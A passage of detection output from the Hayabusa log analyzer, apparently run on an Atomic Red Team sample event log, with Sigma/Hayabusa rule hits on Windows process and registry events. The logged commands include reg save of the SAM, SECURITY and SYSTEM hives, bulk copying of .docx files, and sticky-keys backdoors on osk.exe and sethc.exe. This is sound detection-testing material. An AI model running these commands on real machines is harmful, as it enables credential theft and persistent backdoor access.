MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: 
C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\Security security.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security 
security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\System system.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SAM sam.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .docx : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e 
.docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe 
/f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" 
